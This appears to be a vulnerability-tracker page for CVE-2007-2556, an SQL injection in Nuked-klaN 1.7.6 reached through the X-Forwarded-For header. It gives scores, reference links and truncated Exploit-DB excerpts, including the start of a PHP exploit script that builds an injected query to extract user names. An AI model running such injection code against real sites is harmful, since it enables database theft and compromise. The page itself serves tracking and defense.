CVE-2007-2556
published 2007-05-09CVE-2007-2556: SQL injection vulnerability in Nuked-klaN 1.7.6 allows remote attackers to execute arbitrary SQL commands via the X-Forwarded-For (X_FORWARDED_FOR) HTTP…
PriorityP344high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
3.45%
87.5th percentile
SQL injection vulnerability in Nuked-klaN 1.7.6 allows remote attackers to execute arbitrary SQL commands via the X-Forwarded-For (X_FORWARDED_FOR) HTTP header, as demonstrated by a request to the /nk/ URI.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| nuked-klan | nuked-klan | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Nuked-klaN 1.7.7 / SP4.4 - Multiple Vulnerabilities
exploitdb·2008-10-14
CVE-2007-2556 Nuked-klaN 1.7.7 / SP4.4 - Multiple Vulnerabilities
Nuked-klaN 1.7.7 / SP4.4 - Multiple Vulnerabilities
---
# URL: http://real.o-n.fr/
# Date: 14/10/2008
#
# Special thanks to Louis for remembering me I had to finish it =)
#
# VULNERABILITY DETAILS
# ---------------------
#
# Nuked-klaN suffers from a vulnerability due to HTTP_REFERER, which is not
# correctly filtered before being inserted in nuked_stats_visitor table.
#
# If HTTP headers are not addslashes()'d by PHP, it could lead to a INSERT
# SQL injection.
#
# In function view_referer() (visits.php), referers are extracted from the
# database to perform an other SQL query, without being secured in between.
# This leads to a blind SQL injection.
#
# Theses injections are only possible if Nuked-klaN (NK) considers us as a
# new user, because else it won't touch the nuked_stats_visito
Exploit-DB
Nuked-klaN 1.7.6 - Remote Code Execution
exploitdb·2007-05-05
CVE-2007-2556 Nuked-klaN 1.7.6 - Remote Code Execution
Nuked-klaN 1.7.6 - Remote Code Execution
---
# Website: http://www.acid-root.new.fr/
# PHP conditions: None =]
# Private since 2 months.
#
error_reporting(E_ALL ^ E_NOTICE); # This file require the PhpSploit class.
$xpl = new phpsploit();
$url = 'http://localhost/nk/'; # url
$prx = ''; # proxy :
$pra = ''; # basic authentification
$xpl->agent("Firefox");
$xpl->allowredirection(0);
$xpl->cookiejar(0);
if($prx) $xpl->proxy($prx);
if($pra) $xpl->proxyauth($pra);
$config = array();
$config[] = 'nuked'; # table prefix
$config[] = 'nuked'; # cookie prefix
$config[] = 'ORDER by date LIMIT 1'; # sql conditions
$config[] = 'HAK'; # match, length ';
$request = array();
$request[] = "'$config[3]0',(SELECT pseudo FROM $config[0]_users $config[2]),'$config[3]0'";
$request[] = "'$config[3]1',(SE
No writeups or analysis indexed.
http://osvdb.org/36931http://secunia.com/advisories/25165http://securityreason.com/securityalert/2665http://www.securityfocus.com/archive/1/467750/100/0/threadedhttp://www.securityfocus.com/bid/23835http://www.vupen.com/english/advisories/2007/1662https://exchange.xforce.ibmcloud.com/vulnerabilities/34116https://www.exploit-db.com/exploits/3858http://osvdb.org/36931http://secunia.com/advisories/25165http://securityreason.com/securityalert/2665http://www.securityfocus.com/archive/1/467750/100/0/threadedhttp://www.securityfocus.com/bid/23835http://www.vupen.com/english/advisories/2007/1662https://exchange.xforce.ibmcloud.com/vulnerabilities/34116https://www.exploit-db.com/exploits/3858
2007-05-09
Published